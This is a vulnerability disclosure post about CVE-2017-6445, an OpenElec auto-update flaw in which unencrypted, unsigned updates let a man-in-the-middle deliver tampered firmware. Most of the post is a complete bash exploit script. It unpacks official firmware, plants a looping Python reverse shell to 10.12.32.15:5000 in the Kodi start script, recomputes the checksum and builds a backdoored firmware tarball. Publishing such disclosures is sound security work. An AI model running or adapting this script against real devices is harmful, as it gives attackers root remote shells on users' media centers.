FUN WITH LINUX

OpenElec: Remote Code Execution Vulnerability through Man-In-The-Middle(CVE-2017-6445)

3 March 2017

During my research about update mechanisms of open-source software I discovered vulnerabilities in OpenElec.

Overview

  • System affected: OpenElec
  • CVE: CVE-2017-6445
  • Vulnerable component: auto-update feature
  • Software-Version: 6.0.3, 7.0.1
  • User-Interaction: Reboot required
  • Impact: Remote Code Execution with root permission

Product Description

According to its websiteOpen Embedded Linux Entertainment Center (OpenELEC) is a small Linux based Just Enough Operating System (JeOS) built from scratch as a platform to turn your computer into a Kodi media center.”

Vulnerability

Automatic updates are disabled by default. After enabling it, OpenElec connects to http://update.openelec.tv/updates.php to find out if there is an update for a newer version. If there is a newer version, openelec will download it from http://releases.openelec.tv/<version>.tar(or any other url returned by update.openelec.tv).

openelec-update-schema

The auto-update feature of OpenElec does neither use encrypted connections nor does it use signed updates. A Man-In-The-Middle could manipulate the update-packages to gain root-access remotely.

openelec-attac

In order to run the downloaded firmware, the OpenElec-system has to be rebooted. So at this point user-interaction is required.

Exploit

The following code downloads an openelec-firmware, extracts it, places a reverse-shell into the kodi-startscript and finally generates a backdoored firmware:

#!/bin/bash
 
OPENELEC="OpenELEC-RPi2.arm-7.0.1"
DOWNLOADURL="http://releases.openelec.tv/"
 
TMP="/tmp"
 
cd $TMP
test -e ${OPENELEC}.tar || wget $DOWNLOADURL/${OPENELEC}.tar
test -d $OPENELEC || tar xvf ${OPENELEC}.tar
 
test -d $TMP/unpacked || mkdir $TMP/unpacked
cd $TMP/unpacked
test -d $TMP/unpacked/squashfs-root || unsquashfs $TMP/$OPENELEC/target/SYSTEM
 
cat > $TMP/unpacked/squashfs-root/usr/bin/revshell.sh << EOF
#!/bin/bash
 
while true
do
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.12.32.15",5000));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' > /dev/null 2>&1
done
EOF
 
chmod 777 $TMP/unpacked/squashfs-root/usr/bin/revshell.sh
 
awk '/trap cleanup TERM/ { print; print "/usr/bin/revshell.sh &"; next }1' $TMP/unpacked/squashfs-root/usr/lib/kodi/kodi.sh > $TMP/unpacked/squashfs-root/usr/lib/kodi/kodievil.sh
mv $TMP/unpacked/squashfs-root/usr/lib/kodi/kodievil.sh $TMP/unpacked/squashfs-root/usr/lib/kodi/kodi.sh
chmod 777 $TMP/unpacked/squashfs-root/usr/lib/kodi/kodi.sh
 
mksquashfs squashfs-root/ SYS -noappend -comp gzip
 
mv SYS $TMP/$OPENELEC/target/SYSTEM
cd $TMP/$OPENELEC
md5sum target/SYSTEM > target/SYSTEM.md5
cd $TMP
tar cvf $OPENELEC.evil.tar $OPENELEC
 
 
test -d $TMP/unpacked && rm -fr $TMP/unpacked
test -d $OPENELEC && rm -rf $OPENELEC

Mitigation

Ensure that auto-update is disabled.

Timeline

  • This bug was reported on December 03 2016.
  • Published as Zero-Day after no reply from OpenElec on March 04 2017

Credits

CVE-2017-6445 was discovered by Wolfgang Hotwagner (https://tech.feedyourhead.at/content/openelec-remote-code-execution-vulnerability-through-man-in-the-middle)

[ Security  OpenElec  CVE  ]
Except where otherwise noted, content on this site is licensed under a Creative Commons Attribution 3.0 Unported License.

Copyright 2015-present Hoti